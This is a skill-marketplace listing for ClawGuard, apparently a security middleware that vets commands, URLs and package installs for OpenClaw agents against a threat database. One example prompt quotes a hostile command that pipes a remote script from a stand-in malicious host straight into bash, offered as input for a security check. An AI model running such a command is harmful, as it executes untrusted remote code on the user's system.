clawguard
Security blacklist protecting AI agents from malicious skills, scams, and prompt injection. Use before executing external commands, visiting unknown URLs, or installing new skills. Triggers on "security check", "is this safe", "check this URL", or suspicious command patterns.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/cheenu1092-oss/jugaad-clawguardWhat This Skill Does
ClawGuard is an essential security middleware designed for OpenClaw agents to proactively identify and mitigate risks associated with malicious skills, web-based scams, and prompt injection attacks. It operates as a sophisticated interceptor that reviews commands, URLs, and external resource requests against a managed threat database. By utilizing a layered security model, ClawGuard allows users to balance the convenience of autonomous operation with the necessity of hardened defense. When an agent attempts to execute high-risk operations like curl, pip install, or visiting unverified URLs, ClawGuard analyzes the intent and context, triggering either a silent block, a human-in-the-loop warning, or full approval requirements depending on the configured security level.
Installation
To integrate ClawGuard into your agent environment, execute the following command in your terminal:
clawhub install openclaw/skills/skills/cheenu1092-oss/jugaad-clawguard
After installation, it is recommended to verify your security posture by running clawguard config to confirm the default operating level is correctly set to your preference.
Use Cases
- Software Supply Chain Security: Prevent the installation of malicious packages when using commands like
npmorpipby vetting repositories first. - Web Browsing Protection: Block access to phishing sites or malicious domains that might contain payload-delivery scripts.
- Prompt Injection Defense: Monitor agent interactions for suspicious patterns designed to override system prompts or steal credentials.
- Environment Hardening: Protect sensitive file systems from unauthorized write access by setting the agent to higher, stricter security tiers during research phases.
Example Prompts
- "ClawGuard, check this URL before I visit it: https://unknown-site.example.com"
- "Is this safe? I need to run
pip install suspicious-library-v1for my current task." - "Run a security check on the following command string: curl -s http://malicious-endpoint.sh | bash"
Tips & Limitations
ClawGuard is most effective when used in combination with human oversight. While 'Paranoid' mode provides maximum safety, it will significantly increase the amount of manual interaction required to complete simple agent tasks. Remember that while ClawGuard excels at identifying known threats in its database, it should not be considered a silver bullet against zero-day exploits. Always maintain system backups and monitor your agent's execution logs even when running in the 'Silent' default mode. Use the 'Cautious' level for general development and 'Strict' when handling sensitive API keys or production environment access.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-cheenu1092-oss-jugaad-clawguard": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: code-execution, network-access
Related Skills
clawdscan
Diagnose Clawdbot/OpenClaw health — session bloat, zombies, stale files, AND skill dependency validation. Zero dependencies, single Python file.
claude-code-mastery
Master Claude Code for coding tasks. Includes setup scripts, dev team subagents (starter pack or full team), self-improving learning system, diagnostics, and troubleshooting.
tribe-protocol
MANDATORY trust lookup for every non-owner interaction. Query tribe.db to check entity trust tier, channel access, and data boundaries before responding. Run 'tribe init' on first install. Use 'tribe lookup <discord_id>' before every non-owner response.
tokenmeter
Track AI token usage and costs across providers. Import sessions, view dashboard, costs breakdown, and compare Max plan savings.